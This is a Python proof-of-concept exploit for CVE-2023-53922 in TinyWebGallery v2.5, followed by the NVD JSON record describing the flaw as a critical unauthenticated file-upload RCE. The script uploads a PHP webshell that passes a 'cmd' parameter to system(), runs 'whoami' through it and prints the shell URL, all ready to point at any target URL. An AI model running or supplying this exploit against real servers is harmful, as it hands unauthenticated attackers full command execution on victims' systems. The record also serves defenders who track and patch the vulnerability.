CVE-2023-53922

import requests import sys # CVE-2023-53922 PoC - TinyWebGallery RCE via Unrestricted File Upload # Target: TinyWebGallery v2.5 # Vulnerability: Unauthenticated remote code execution via admin upload functionality def exploit(target_url, webshell_path='/admin/photos/evil.php'): """ Exploit for CVE-2023-53922 Args: target_url: Base URL of vulnerable TinyWebGallery instance webshell_path: Path where webshell will be uploaded Returns: bool: True if exploitation successful """ # Step 1: Generate malicious PHP webshell webshell_content = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Step 2: Prepare multipart form data upload upload_url = f"{target_url}/admin/index.php" files = { 'file': ('evil.php', webshell_content, 'application/x-php'), 'action': (None, 'upload'), } try: # Step 3: Upload malicious file (no authentication required) print(f"[*] Uploading malicious PHP file to {upload_url}...") response = requests.post(upload_url, files=files, timeout=10) # Step 4: Verify upload and test RCE shell_url = f"{target_url}{webshell_path}" print(f"[*] Testing webshell at {shell_url}...") test_response = requests.get(shell_url, params={'cmd': 'whoami'}, timeout=10) if test_response.status_code == 200: print(f"[+] SUCCESS! RCE achieved!") print(f"[+] Command output: {test_response.text.strip()}") print(f"[+] Webshell URL: {shell_url}?cmd=<command>") return True else: print(f"[-] Failed: HTTP {test_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/twg") sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target)

{"cve": {"id": "CVE-2023-53922", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:51.270", "lastModified": "2025-12-24T16:50:20.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TinyWebGallery v2.5 contains a remote code execution vulnerability in the admin upload functionality that allows unauthenticated attackers to upload malicious PHP files. Attackers can upload .phar files with embedded system commands to execute arbitrary code on the server by accessing the uploaded file's URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinywebgallery:tinywebgallery:2.5:*:*:*:*:*:*:*", "matchCriteriaId": "B3FAA560-76CA-4FEB-A469-5D9FBC5A82F4"}]}]}], "references": [{"url": "http://www.tinywebgallery.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51443", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/tinywebgallery-remote-code-execution-via-unrestricted-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51443", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}